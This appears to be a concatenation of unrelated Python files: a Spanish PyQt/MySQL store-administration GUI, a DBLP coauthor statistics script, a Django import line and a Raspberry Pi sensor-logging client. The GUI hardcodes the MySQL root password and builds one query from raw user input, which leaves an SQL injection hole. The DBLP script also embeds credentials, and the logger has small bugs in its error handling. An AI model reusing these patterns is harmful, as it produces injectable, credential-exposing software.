elif(nm==""):
ms.showEMessageBox("Descripcion vacio")
elif(ape==""):
ms.showEMessageBox("Cantidad vacio, tiene letras o es menor a 0")
elif(str(cor).isalpha() or cor=="" or int(cor)<0):
ms.showEMessageBox("el precio esta vacio, tiene letras o es menor a 0")
elif(str(tel).isalpha() or tel=="" or int(tel)<0):
ms.showEMessageBox("la categoria esta vacio o tiene alguna letra en su contenedor y no puede ser menor a 0")
else:
mess1 = "%s, %s, %s, %s, %s, %s"%(prot,uid,nm,ape,cor,tel)
met = mess1
abc.send(met)
ms.showCMessageBox("Exito")
class editara(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
global cod, desc, st,pre,cat
l1 = QLabel("Codigo de Articulo")
cod = QTextEdit()
l2 = QLabel("Descripcion")
desc = QTextEdit()
l3 = QLabel("Stock")
st = QTextEdit()
l4 = QLabel("Precio")
pre = QTextEdit()
l5 = QLabel("Categoria")
cat = QTextEdit()
fbox = QFormLayout()
fbox.addRow(l1,cod)
fbox.addRow(l2,desc)
fbox.addRow(l3,st)
fbox.addRow(l4,pre)
fbox.addRow(l5,cat)
p1 = QPushButton("Actualizar")
fbox.addRow(p1)
self.connect(p1, SIGNAL('clicked()'), self.actuar)
self.widget = QWidget()
self.widget.setLayout(fbox)
self.setCentralWidget(self.widget)
self.setWindowTitle("Editar articulos")
def actuar(self):
abc = client()
prot = "UpdateA"
uid = cod.toPlainText()
nm = desc.toPlainText()
ape= st.toPlainText()
cor= pre.toPlainText()
tel= cat.toPlainText()
ms= Ui_Dialog()
if(str(uid).isalpha() or uid == "" or int(uid)<0):
ms.showEMessageBox("Id no puede contener letras o estar vacio y no puede ser menor a 0")
elif(nm==""):
ms.showEMessageBox("Descripcion vacio")
elif(ape==""):
ms.showEMessageBox("Cantidad vacio, tiene letras o es menor a 0")
elif(str(cor).isalpha() or cor=="" or int(cor)<0):
ms.showEMessageBox("el precio esta vacio, tiene letras o es menor a 0")
elif(str(tel).isalpha() or tel=="" or int(tel)<0):
ms.showEMessageBox("la categoria esta vacio o tiene alguna letra en su contenedor y no puede ser menor a 0")
else:
mess1 = "%s, %s, %s, %s, %s, %s"%(prot,uid,nm,ape,cor,tel)
met = mess1
abc.send(met)
ms.showCMessageBox("Articulo Actualizad@")
class eliminara(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
l1 = QLabel("Codigo de Articulo")
cod = QTextEdit()
fbox = QFormLayout()
fbox.addRow(l1,cod)
button = QPushButton("Eliminar")
fbox.addRow(button)
self.connect(button, SIGNAL('clicked()'), self.elia)
self.widget = QWidget()
self.widget.setLayout(fbox)
self.setCentralWidget(self.widget)
self.setWindowTitle("Eliminar articulos")
def elia(self):
abc = client()
prot = "Eliminar"
prot2 = "Artic"
ed=cod.toPlainText()
ms= Ui_Dialog()
if(str(ed).isalpha() or ed == "" or int(ed)<0):
ms.showEMessageBox("Id no puede contener letras o estar vacio o ser menor a 0")
else:
mess1 = "%s, %s, %s"%(prot,prot2,ed)
met = mess1
abc.send(met)
ms.showCMessageBox("Usuario Eliminao!!!! FOREVA!")
class articulos(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
layout = QHBoxLayout()
button = QPushButton("Lista de articulos disponibles")
button2 = QPushButton("Agregar articulos")
button3 = QPushButton("Editar articulos")
button4 = QPushButton("Eliminar articulos")
layout.addWidget(button)
layout.addWidget(button2)
layout.addWidget(button3)
layout.addWidget(button4)
self.widget = QWidget()
self.widget.setLayout(layout)
self.setCentralWidget(self.widget)
self.setWindowTitle("Administrar Articulos")
self.connect(button, SIGNAL('clicked()'), self.listaa)
self.connect(button2, SIGNAL('clicked()'), self.agregara)
self.connect(button3, SIGNAL('clicked()'), self.editara)
self.connect(button4, SIGNAL('clicked()'), self.eliminara)
def listaa(self):
self.mylista = listaa()
self.mylista.show()
def agregara(self):
self.myadda = agregara()
self.myadda.show()
def editara(self):
self.myedita = editara()
self.myedita.show()
def eliminara(self):
self.mydeleta = eliminara()
self.mydeleta.show()
################# aca para arriba ^ articulos#########
################# Todo lo de ventas Aca abajo###################
class registro_ventas(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
ventastable = QTableView()
layout = QHBoxLayout()
layout.addWidget(ventastable)
con = MySQLdb.connect('localhost','root','oveja','Tienda Virtual')
cursor = con.cursor()
cursor.execute("SELECT idFacturacion as '#Factura', Fecha, nombrart as 'Articulo Vendido', Precio_total as 'Precio Unitario', Nombre as 'Comprador', idUsuarios as 'id' FROM Facturacion,Usuarios where User_id = idUsuarios;")
save = cursor.fetchall()
tablemodel = MyTableModel(save, self)
ventastable.setModel(tablemodel)
self.widget = QWidget()
self.widget.setLayout(layout)
self.setCentralWidget(self.widget)
self.setWindowTitle("Registro de ventas")
class ventas_por_categoria(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
global buscar, Ventasxc
button = QPushButton("Buscar")
buscar= QTextEdit()
con = MySQLdb.connect('localhost','root','oveja','Tienda Virtual')
Ventasxc= QTableView()
layout = QHBoxLayout()
layout.addWidget(Ventasxc)
leyout = QVBoxLayout()
leyout.addWidget(button)
leyout.addWidget(buscar)
layout.addLayout(leyout)
self.widget = QWidget()
self.widget.setLayout(layout)
self.setCentralWidget(self.widget)
self.setWindowTitle("Ventas por Categoria")
self.connect(button, SIGNAL('clicked()'), self.llenartablita)
def llenartablita(self):
con = MySQLdb.connect('localhost','root','oveja','Tienda Virtual')
cursor = con.cursor()
tent = buscar.toPlainText()
cursor.execute("SELECT idFacturacion as '#Factura', Fecha, nombrart as 'Articulo Vendido', Precio_total as 'Precio Unitario', Nombre as 'Comprador', idUsuarios as 'id' FROM Facturacion, Articulos, Usuarios, Categoria where nombrart=Articulos.Descripcion AND User_id = idUsuarios and Categoria.Descripcion = '%s';"%(tent))
save = cursor.fetchall()
tablemodel = MyTableModel(save, self)
Ventasxc.setModel(tablemodel)
class ventas(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
layout = QHBoxLayout()
button = QPushButton("Registro de ventas")
button2= QPushButton("Registro de ventas por categoria")
layout.addWidget(button)
layout.addWidget(button2)
self.widget = QWidget()
self.widget.setLayout(layout)
self.setCentralWidget(self.widget)
self.setWindowTitle("Ventas")
self.connect(button, SIGNAL('clicked()'), self.registro)
self.connect(button2, SIGNAL('clicked()'), self.registroc)
def registro(self):
self.myreg = registro_ventas()
self.myreg.show()
def registroc(self):
self.myregc = ventas_por_categoria()
self.myregc.show()
################# aca para arriba ^ Ventas#########
################# Todo lo de Usuarios Aca abajo###################
class listac(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
self.widget = QWidget()
cattable = QTableView()
layout = QHBoxLayout()
layout.addWidget(cattable)
con = MySQLdb.connect('localhost','root','oveja','Tienda Virtual')
cursor = con.cursor()
cursor.execute("SELECT * FROM Categoria;")
save = cursor.fetchall()
tablemodel = MyTableModel(save, self)
cattable.setModel(tablemodel)
self.widget = QWidget()
self.widget.setLayout(layout)
self.setCentralWidget(self.widget)
self.setWindowTitle("Lista de categorias")
class agregarc(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
global cod, desc
l1 = QLabel("Codigo de Categoria")
cod = QTextEdit()
l2 = QLabel("Descripcion")
desc = QTextEdit()
fbox = QFormLayout()
fbox.addRow(l1,cod)
fbox.addRow(l2,desc)
button1= QPushButton("Agregar")
fbox.addRow(button1)
self.connect(button1, SIGNAL('clicked()'), self.insertc)
self.widget = QWidget()
self.widget.setLayout(fbox)
self.setCentralWidget(self.widget)
self.setWindowTitle("Agregar categoria")
def insertc(self):
abc = client()
prot = "Insertarad"
prot2 = "Categoria"
de=cod.toPlainText()
dcp=desc.toPlainText()
ms= Ui_Dialog()
if(str(de).isalpha() or int(de)<0 or de==""):
ms.showEMessageBox("Id no puede contener letras ni ser menor a 0")
elif(dcp==""):
ms.showEMessageBox("La descripcion esta vacia")
else:
mess1 = "%s, %s, %s, %s"%(prot,prot2,de,dcp)
met = mess1
abc.send(met)
ms.showCMessageBox("Exito")
class editarc(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
global cod, cod1,desc
l1 = QLabel("Codigo de Categoria Viejo")
cod = QTextEdit()
l2 = QLabel("Descripcion Nueva")
desc = QTextEdit()
fbox = QFormLayout()
fbox.addRow(l1,cod)
fbox.addRow(l2,desc)
p1 = QPushButton("Actualizar")
fbox.addRow(p1)
self.connect(p1, SIGNAL('clicked()'), self.actuC)
self.widget = QWidget()
self.widget.setLayout(fbox)
self.setCentralWidget(self.widget)
self.setWindowTitle("Editar categoria")
def actuC(self):
abc = client()
prot = "Updatead"
prot2 = "Categoria"
ed=cod.toPlainText()
de = ed
dcp=desc.toPlainText()
ms= Ui_Dialog()
if(str(de).isalpha() or int(de)<0 or de==""):
ms.showEMessageBox("Id no puede contener letras ni ser menor a 0")
elif(dcp==""):
ms.showEMessageBox("La descripcion esta vacia")
else:
mess1 = "%s, %s, %s, %s"%(prot,prot2,ed,dcp)
met = mess1
abc.send(met)
ms.showCMessageBox("Categoria Actualizada")
class eliminarc(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
global cod
l1 = QLabel("Codigo de Categoria")
cod = QTextEdit()
fbox = QFormLayout()
fbox.addRow(l1,cod)
button = QPushButton("Eliminar")
fbox.addRow(button)
self.widget = QWidget()
self.widget.setLayout(fbox)
self.setCentralWidget(self.widget)
self.setWindowTitle("Eliminar categoria")
self.connect(button, SIGNAL('clicked()'), self.elic)
def elic(self):
abc = client()
prot = "Eliminar"
prot2 = "Categoria"
ed=cod.toPlainText()
ms= Ui_Dialog()
if(str(ed).isalpha() or ed == "" or int(ed)<0):
ms.showEMessageBox("Id no puede contener letras o estar vacio o ser menor a 0")
else:
mess1 = "%s, %s, %s"%(prot,prot2,ed)
met = mess1
abc.send(met)
ms.showCMessageBox("Usuario Eliminao!!!! FOREVA!")
class Categorias(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
layout = QHBoxLayout()
button = QPushButton("Lista de categorias disponibles")
button2 = QPushButton("Agregar categorias")
button3 = QPushButton("Editar categorias")
button4 = QPushButton("Eliminar categorias")
layout.addWidget(button)
layout.addWidget(button2)
layout.addWidget(button3)
layout.addWidget(button4)
self.widget = QWidget()
self.widget.setLayout(layout)
self.setCentralWidget(self.widget)
self.setWindowTitle("Categorias")
self.connect(button, SIGNAL('clicked()'), self.listac)
self.connect(button2, SIGNAL('clicked()'), self.agregarc)
self.connect(button3, SIGNAL('clicked()'), self.editarc)
self.connect(button4, SIGNAL('clicked()'), self.eliminarc)
def listac(self):
self.mylistc = listac()
self.mylistc.show()
def agregarc(self):
self.myaddc = agregarc()
self.myaddc.show()
def editarc(self):
self.myeditc = editarc()
self.myeditc.show()
def eliminarc(self):
self.mydeletc = eliminarc()
self.mydeletc.show()
################# aca para arriba ^ categorias#########
################# Todo lo de Usuarios Aca abajo###################
class listau(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
self.widget = QWidget()
clientetable = QTableView()
layout = QHBoxLayout()
layout.addWidget(clientetable)
con = MySQLdb.connect('localhost','root','oveja','Tienda Virtual')
cursor = con.cursor()
cursor.execute("SELECT idUsuarios, Nombre, Apellidos, Correo, Telefono, Descrip as 'Pais', Cod_postal as 'Codigo postal' , Descripcion as 'Tipo Usuario' FROM Usuarios, Pais, Tipo_usuario where cod_pais = idPais and Tipo_usuario = Cod_Tipo_Usuario;")
save = cursor.fetchall()
tablemodel = MyTableModel(save, self)
clientetable.setModel(tablemodel)
self.widget = QWidget()
self.widget.setLayout(layout)
self.setCentralWidget(self.widget)
self.setWindowTitle("Lista de usuarios")
class agregaru(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
l1 = QLabel("Cedula")
global ida, nom, ap, corr, telf, tip, pais, cod, contr
ida= QTextEdit()
l2 = QLabel("Nombre")
nom = QTextEdit()
l3 = QLabel("Apellido")
ap = QTextEdit()
l4 = QLabel("Correo")
corr = QTextEdit()
l10 = QLabel("Telefono")
telf = QTextEdit()
l5 = QLabel("Tipo de Usuario")
tip = QTextEdit()
l6 = QLabel("Pais")
pais = QTextEdit()
l7 = QLabel("Codigo Postal")
cod = QTextEdit()
l8 = QLabel("Contrasena")
contr = QTextEdit()
fbox = QFormLayout()
fbox.addRow(l1,ida)
vbox = QVBoxLayout()
vbox.addWidget(nom)
fbox.addRow(l2,vbox)
fbox.addRow(l3,ap)
fbox.addRow(l4,corr)
fbox.addRow(l10,telf)
fbox.addRow(l5,tip)
fbox.addRow(l6,pais)
fbox.addRow(l7,cod)
fbox.addRow(l8,contr)
button1 = QPushButton("Registrar")
fbox.addRow(button1)
self.widget = QWidget()
self.widget.setLayout(fbox)
self.setCentralWidget(self.widget)
self.setWindowTitle("Agregar usuarios")
self.connect(button1, SIGNAL('clicked()'), self.insertt)
def insertt(self):
abc = client()
prot = "UsuarioI"
uid = ida.toPlainText()
nm = nom.toPlainText()
ape= ap.toPlainText()
cor= corr.toPlainText()
tel = telf.toPlainText()
cp= pais.toPlainText()
cps= cod.toPlainText()
contra = contr.toPlainText()
tipo= tip.toPlainText()
ms= Ui_Dialog()
if(str(uid).isalpha() or uid == ""):
ms.showEMessageBox("Id no puede contener letras o estar vacio")
elif(nm==""):
ms.showEMessageBox("el Nombre esta vacio")
elif(ape==""):
ms.showEMessageBox("el apellido esta vacio")
elif(cor==""):
ms.showEMessageBox("el correo esta vacio")
elif(str(tel).isalpha() or tel=="" or int(tel)<0):
ms.showEMessageBox("el telefono esta vacio o tiene alguna letra en su contenedor o es menor a 0")
elif(str(cp).isalpha() or cp=="" or int(cp)<0):
ms.showEMessageBox("el codigo pais esta vacio o tiene letras en su contenedor o es menor a 0")
elif(str(cps).isalpha() or cps=="" or int(cps)<0):
ms.showEMessageBox("Codigo postal esta vacio, tiene letras o es menor a 0")
elif(contra==""):
ms.showEMessageBox("Password esta vacio")
elif(str(tipo).isalpha() or tipo=="" or int(tipo)<0):
ms.showEMessageBox("el tipo esta vacio o tiene letras en su contenedor")
else:
mess1 = "%s, %s, %s, %s, %s, %s, %s, %s, %s, %s"%(prot,uid,nm,ape,cor,tel,cp,cps,contra,tipo)
met = mess1
abc.send(met)
ms.showCMessageBox("Usuario Actualizad@")
class editaru(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
global ced, nom, ap, corr, tip, pais, cod, contr,telf
l1 = QLabel("Cedula")
ced = QTextEdit()
l2 = QLabel("Nombre")
nom = QTextEdit()
l3 = QLabel("Apellido")
ap = QTextEdit()
l4 = QLabel("Correo")
corr = QTextEdit()
l5 = QLabel("Tipo de Usuario")
tip = QTextEdit()
l6 = QLabel("Pais")
pais = QTextEdit()
l7 = QLabel("Codigo Postal")
cod = QTextEdit()
l8 = QLabel("Contrasena")
contr = QTextEdit()
l9 = QLabel("Telefono")
telf = QTextEdit()
fbox = QFormLayout()
fbox.addRow(l1,ced)
vbox = QVBoxLayout()
vbox.addWidget(nom)
fbox.addRow(l2,vbox)
fbox.addRow(l3,ap)
fbox.addRow(l4,corr)
fbox.addRow(l9,telf)
fbox.addRow(l5,tip)
fbox.addRow(l6,pais)
fbox.addRow(l7,cod)
fbox.addRow(l8,contr)
p1 = QPushButton("Actualizar")
fbox.addRow(p1)
self.connect(p1, SIGNAL('clicked()'), self.actu)
self.widget = QWidget()
self.widget.setLayout(fbox)
self.setCentralWidget(self.widget)
self.setWindowTitle("Editar Usuarios")
def actu(self):
abc = client()
prot = "UsuarioU"
uid = ced.toPlainText()
nm = nom.toPlainText()
ape= ap.toPlainText()
cor= corr.toPlainText()
tel = telf.toPlainText()
cp= pais.toPlainText()
cps= cod.toPlainText()
contra = contr.toPlainText()
tipo= tip.toPlainText()
ms= Ui_Dialog()
if(str(uid).isalpha() or uid == ""):
ms.showEMessageBox("Id no puede contener letras o estar vacio")
elif(nm==""):
ms.showEMessageBox("el Nombre esta vacio")
elif(ape==""):
ms.showEMessageBox("el apellido esta vacio")
elif(cor==""):
ms.showEMessageBox("el correo esta vacio")
elif(str(tel).isalpha() or tel=="" or int(tel)<0):
ms.showEMessageBox("el telefono esta vacio o tiene alguna letra en su contenedor o es menor a 0")
elif(str(cp).isalpha() or cp=="" or int(cp)<0):
ms.showEMessageBox("el codigo pais esta vacio o tiene letras en su contenedor o es menor a 0")
elif(str(cps).isalpha() or cps=="" or int(cps)<0):
ms.showEMessageBox("Codigo postal esta vacio, tiene letras o es menor a 0")
elif(contra==""):
ms.showEMessageBox("Password esta vacio")
elif(str(tipo).isalpha() or tipo=="" or int(tipo)<0):
ms.showEMessageBox("el tipo esta vacio o tiene letras en su contenedor")
else:
mess1 = "%s, %s, %s, %s, %s, %s, %s, %s, %s, %s"%(prot,uid,nm,ape,cor,tel,cp,cps,contra,tipo)
met = mess1
abc.send(met)
ms.showCMessageBox("Usuario Actualizad@")
class eliminaru(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
global ced,nom, ap
l1 = QLabel("Cedula")
ced = QTextEdit()
fbox = QFormLayout()
fbox.addRow(l1,ced)
button = QPushButton("Eliminar")
fbox.addRow(button)
self.widget = QWidget()
self.widget.setLayout(fbox)
self.setCentralWidget(self.widget)
self.setWindowTitle("Eliminar usuarios")
self.connect(button, SIGNAL('clicked()'), self.eliu)
def eliu(self):
abc = client()
prot = "Eliminar"
prot2 = "User"
ed=ced.toPlainText()
ms= Ui_Dialog()
if(str(ed).isalpha() or ed == "" or int(ed)<0):
ms.showEMessageBox("Id no puede contener letras o estar vacio o ser menor a 0")
else:
mess1 = "%s, %s, %s"%(prot,prot2,ed)
met = mess1
abc.send(met)
ms.showCMessageBox("Usuario Eliminao!!!! FOREVA!")
class Client(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
layout = QHBoxLayout()
lineEdit = QTextEdit()
button = QPushButton("Ver lista de Usuarios")
button2 = QPushButton("Agregar Usuario Nuevo")
button3 = QPushButton("Editar Usuarios")
button4 = QPushButton("Eliminar Usuarios")
layout.addWidget(button)
layout.addWidget(button2)
layout.addWidget(button3)
layout.addWidget(button4)
self.widget = QWidget()
self.widget.setLayout(layout)
self.setCentralWidget(self.widget)
self.setWindowTitle("Aministrador de usuarios")
self.connect(button, SIGNAL('clicked()'), self.listau)
self.connect(button2, SIGNAL('clicked()'), self.agregaru)
self.connect(button3, SIGNAL('clicked()'), self.editaru)
self.connect(button4, SIGNAL('clicked()'), self.eliminaru)
def listau(self):
self.mylistu = listau()
self.mylistu.show()
def agregaru(self):
self.myaddu = agregaru()
self.myaddu.show()
def editaru(self):
self.myeditu = editaru()
self.myeditu.show()
def eliminaru(self):
self.mydeletu = eliminaru()
self.mydeletu.show()
################Usuarios de ^ ##############################
##############Todo lo de la main windown V abajo############
class MainWindow(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
layout = QVBoxLayout()
button = QPushButton("Administrar Usuarios")
button2 = QPushButton("Administrar Articulos")
button3 = QPushButton("Administrar Categorias")
button4 = QPushButton("Administrar Ventas")
layout.addWidget(button)
layout.addWidget(button2)
layout.addWidget(button3)
layout.addWidget(button4)
self.widget = QWidget()
self.widget.setLayout(layout)
self.setCentralWidget(self.widget)
self.setWindowTitle("Servidor")
self.connect(button, SIGNAL('clicked()'), self.newWindow)
self.connect(button2, SIGNAL('clicked()'), self.newWindow2)
self.connect(button3, SIGNAL('clicked()'), self.newWindow3)
self.connect(button4, SIGNAL('clicked()'), self.newWindow4)
def newWindow(self):
self.myClient = Client()
self.myClient.show()
def newWindow2(self):
self.misArticulos = articulos()
self.misArticulos.show()
def newWindow3(self):
self.myCats = Categorias()
self.myCats.show()
def newWindow4(self):
self.myvent = ventas()
self.myvent.show()
############# de aca para ^ main windown y abajo el Main func##########
if __name__ == "__main__":
app = QApplication(sys.argv)
mainWindow = MainWindow()
mainWindow.setGeometry(200, 200, 200, 200)
mainWindow.show()
sys.exit(app.exec_()) #Funcion Main :)
|
997,765 | f19a7895ee072fb8a0b33d3106908455925fd375 | from sqlalchemy import *
from sqlalchemy.orm import *
from tables import *
engine = create_engine("postgresql://cavuser:cavuser@localhost:5432/cav_dblp")
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
def get_name(author_id):
return engine.execute(text("SELECT name FROM authors WHERE id=:id;"), id=author_id).fetchall()[0]
import operator
def coauthors_within_5y_span():
print "Number of coauthors within 5 year span"
for l in range(1989, 2010):
print l, "to", (l+5)
co_authors_in_range = dict()
for author in session.query(Author):
# I'm sure there is a much better way to do this using SQL and SQL Alchemy
co_authors_in_range[author.id] = len(engine.execute(text("""
SELECT DISTINCT ON (limited_to_author.author_id)
pub.year, limited_to_author.author_id, limited_to_author.publication_id
FROM publications pub
INNER JOIN (
SELECT pa.publication_id, pa.author_id
FROM publication_authors pa
WHERE pa.publication_id IN (
(SELECT publication_id
FROM publication_authors
WHERE author_id=:id)
)) limited_to_author
ON pub.id=limited_to_author.publication_id
WHERE year>=:lower AND year<:upper;
"""), id = author.id, lower=l, upper=(l+5)).fetchall())
m = sorted(co_authors_in_range.iteritems(), key=operator.itemgetter(1))[-3:]
m.reverse()
for i in range(3):
print (i+1), ")", get_name(m[i][0]), "with", m[i][1]
def publications_within_5y_span():
print "Number of publications within 5 year span"
for l in range(1989, 2010):
print l, "to", (l+5)
publications_in_range = dict()
for author in session.query(Author):
# I'm sure there is a much better way to do this using SQL and SQL Alchemy
publications_in_range[author.id] = len(engine.execute(text("""
SELECT
pub.year, limited_to_author.author_id, limited_to_author.publication_id
FROM publications pub
INNER JOIN (
(SELECT author_id, publication_id
FROM publication_authors
WHERE author_id=:id)
) limited_to_author
ON pub.id=limited_to_author.publication_id
WHERE year>=:lower AND year<:upper;
"""), id = author.id, lower=l, upper=(l+5)).fetchall())
m = sorted(publications_in_range.iteritems(), key=operator.itemgetter(1))[-3:]
m.reverse()
for i in range(3):
print (i+1), ")", get_name(m[i][0]), "with", m[i][1]
def single_author_papers():
print "Single author papers"
publications = dict()
for author in session.query(Author):
# I'm sure there is a much better way to do this using SQL and SQL Alchemy
publications[author.id] = len(engine.execute(text("""
SELECT pub.author_id, pub.publication_id
FROM publication_authors pub
INNER JOIN (
SELECT publication_id
FROM publication_authors
GROUP BY publication_id
HAVING COUNT(author_id) = 1
) single_author_papers
ON pub.publication_id = single_author_papers.publication_id
WHERE author_id=:id;
"""), id = author.id).fetchall())
m = sorted(publications.iteritems(), key=operator.itemgetter(1))[-3:]
m.reverse()
for i in range(3):
print (i+1), ")", get_name(m[i][0]), "with", m[i][1]
single_author_papers()
print ""
coauthors_within_5y_span()
print ""
publications_within_5y_span()
|
997,766 | b4d78da93511493fd9fe69cda1d089997ae16c7e |
from django.contrib.auth import get_backends, authenticate
|
997,767 | 87b206eab89ff6f4f464721bea7f8f8f2dcbb326 | # -*- coding: utf-8 -*-
import socket
import os, sys
from module_declarations import PL1012DataFormat, PL1012BYTE_N, SAMPLING_BASE_TIME, SCREEN_POS, BYTE_N, CWD_PATH
from module_declarations import SKT_PATH, SKT_PL1000, SKT_TC08, HW_SN_EN, TC08DataFormat, TC08FLOAT_N, PEAKDataFormat
from module_declarations import PC_OFFLINE, RPI_DEVELOPMENT, RPI_PRODUCTION
import time
import datetime
import xml.etree.ElementTree
import csv
import threading
# Class for thread running a blinking of PowerStatus LED
class BlinkPowerLed (threading.Thread):
def __init__(self, thread_id, name, counter):
threading.Thread.__init__(self)
self.threadID = thread_id
self.name = name
self.counter = counter
def run(self):
print("Starting " + self.name)
while power_latch:
set_power_led(LED_OFF)
time.sleep(0.25)
set_power_led(LED_ON)
time.sleep(0.25)
print("Exiting " + self.name)
# Class for thread running a blinking of PowerStatus LED
class BlinkLoggingLed (threading.Thread):
def __init__(self, thread_id, name, counter):
threading.Thread.__init__(self)
self.threadID = thread_id
self.name = name
self.counter = counter
def run(self):
print("Starting " + self.name)
while logging_led_status:
set_logging_led(LED_OFF)
time.sleep(0.5)
set_logging_led(LED_ON)
time.sleep(0.5)
print("Exiting " + self.name)
# Function for printing in Screen Matrix the displayed values
#
def print_xy(x, y, contents=None, color=None):
sys.stdout.write("\x1b7\x1b[%d;%df%s\x1b8" % (x, y, contents))
sys.stdout.flush()
# Function for detecting the Key status from RPI GPIO
# The key status is connected to Raspberry GPIO 3
def key_status():
key_status_detected = GPIO.input(3)
return key_status_detected
# Function for setting the power status indicator LED mode
# The power status indicator LED is connected to Raspberry GPIO 9
def set_power_led(status):
GPIO.output(9,status)
# Function for setting the logging status indicator LED mode
# The logging status indicator LED is connected to Raspberry GPIO 7
def set_logging_led(status):
GPIO.output(7,status)
return status
# Function for setting the power latch enable mode
# The power latch enable is connected to Raspberry GPIO 5
def set_power_latch(status):
GPIO.output(5,status)
return status
# Function for linearize signal before writing records to CSV file
def linearise_signal(raw_value,parameters):
linearized_value = None
if parameters['hw'] == "pl1012":
linearized_value = raw_value*float(parameters['slope'])+float(parameters['offset'])
if parameters['hw'] == "pcan":
resolution = float(parameters['resolution'])
offset = float(parameters['offset'])
if int(parameters['bits']) == 8 and int(parameters['bit_offset']) == 0:
try:
linearized_value = float(raw_value[0])*resolution+offset
except:
print("\n8 bits raw_value not convertible ='{}'".format(raw_value))
print("for parameter ='{}'\n".format(parameters))
linearized_value= None
elif int(parameters['bits']) == 16 and int(parameters['bit_offset']) == 0:
try:
lsbyte = float(raw_value[0])
msbyte = float(raw_value[1])
raw_value_int = lsbyte+msbyte*2**8
linearized_value = float(raw_value_int)*resolution+offset
except:
print("\n16 bits raw_value not convertible ='{}'".format(raw_value))
print("for parameter ='{}'\n".format(parameters))
linearized_value= None
else:
#TODO CAN linearization for data lenth less than 8 bits
print("\nno 8 and no 16 bits raw_value not convertible ='{}'".format(raw_value))
print("for parameter ='{}'\n".format(parameters))
linearized_value = None
return linearized_value
# Function sending command to Sockets client
def send_command(socket_client=None,command=None):
bcommand = command.encode('utf-8')
socket_client.send(bcommand)
environment = PC_OFFLINE
if environment == PC_OFFLINE:
bt = SAMPLING_BASE_TIME.total_seconds()
sleep_time = bt
lag_correction = 0.0
full_connect= False
from RPiSim.GPIO import GPIO
elif environment == RPI_PRODUCTION:
bt = SAMPLING_BASE_TIME.total_seconds()
sleep_time = bt
lag_correction = 0.0
full_connect = False
GPIO.setmode(GPIO.BCM)
KEY_ON = True
KEY_OFF = False
LED_ON = GPIO.HIGH
LED_OFF = GPIO.LOW
GPIO.setup(3, GPIO.IN, initial=GPIO.HIGH, pull_up_down=GPIO.PUD_UP) # this is the key sense input
GPIO.setup(5, GPIO.OUT, initial=GPIO.HIGH, pull_up_down=GPIO.PUD_DOWN) # this the power latch enable output
logging_led_status = GPIO.LOW
GPIO.setup(7, GPIO.OUT, initial=logging_led_status, pull_up_down=GPIO.PUD_DOWN) # this is the Datalogging running blinking led
GPIO.setup(9,GPIO.OUT, initial=GPIO.LOW, pull_up_down=GPIO.PUD_DOWN) # this is the power state led output
if key_status() == KEY_ON:
set_power_led(GPIO.HIGH)
power_latch = set_power_latch(GPIO.HIGH)
else:
set_power_led(GPIO.LOW)
sys.exit(2)
#TODO develop the LED blinking and fixed
#TODO develop the power latch management
# calculates required connections total number
total_connection_req_conf = 0
for item in iter(HW_SN_EN):
print(item)
if HW_SN_EN[item]["en"]:
total_connection_req_conf += 1
print("Connecting... looking for {} devices.".format(total_connection_req_conf))
time_conn_begin = datetime.datetime.now()
total_connection_req_det = 0
# Create clients for the three sockets
# Create PL1012 socket client
if HW_SN_EN["PL1000"]["en"]:
try:
# Starting C modules streaming sockets
# Starting PL1000
if os.path.exists(os.path.join(SKT_PATH,HW_SN_EN["PL1000"]["socket_file"])):
client_PL1012 = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
client_PL1012.connect(os.path.join(SKT_PATH,HW_SN_EN["PL1000"]["socket_file"]))
answ = client_PL1012.recv(20)
total_connection_req_det += 1
else:
answ = "socket file {} not found".format(os.path.join(SKT_PATH,HW_SN_EN["PL1000"]["socket_file"]))
except Exception as e:
print("something's wrong. Exception is %s" % (e))
answ = "None"
finally:
print("Answer from server PL1012 socket: {}".format(answ))
print("Ready.")
# print("Ctrl-C to quit.")
# print("Sending 'DONE' shuts down the server and quits.")
# Create TC08 socket client
if HW_SN_EN["TC08"]["en"]:
try:
if os.path.exists(os.path.join(SKT_PATH, HW_SN_EN["TC08"]["socket_file"])):
client_TC08 = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
client_TC08.connect(os.path.join(SKT_PATH, HW_SN_EN["TC08"]["socket_file"]))
answ = client_TC08.recv(20)
total_connection_req_det += 1
else:
answ = "socket file {} not found".format(os.path.join(SKT_PATH,HW_SN_EN["PL1000"]["socket_file"]))
except Exception as e:
print("something's wrong with %s:%d. Exception is %s" % (address, port, e))
answ = "None"
finally:
print("Answer from server TC08 socket: {}".format(answ))
print("Ready.")
print("Ctrl-C to quit.")
print("Sending 'DONE' shuts down the server and quits.")
# Create PCAN socket client
if HW_SN_EN["PEAK"]["en"]:
try:
if os.path.exists(os.path.join(SKT_PATH, HW_SN_EN["PEAK"]["socket_file"])):
client_PEAK = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
client_PEAK.connect(os.path.join(SKT_PATH, HW_SN_EN["PEAK"]["socket_file"]))
answ = client_PEAK.recv(20)
total_connection_req_det += 1
else:
answ = "socket file {} not found".format(os.path.join(SKT_PATH, HW_SN_EN["PL1000"]["socket_file"]))
except Exception as e:
print("something's wrong with opening PEAK. Exception is %s " % (e))
answ = "None"
finally:
print("Answer from server PEAK socket: {}".format(answ))
print("Ready.")
print("Ctrl-C to quit.")
print("Sending 'DONE' shuts down the server and quits.")
_=os.system("clear")
sys.stdout.flush()
if total_connection_req_det != total_connection_req_conf:
sys.exit(1)
# Parsing channels configuration from xml file
# BEGIN
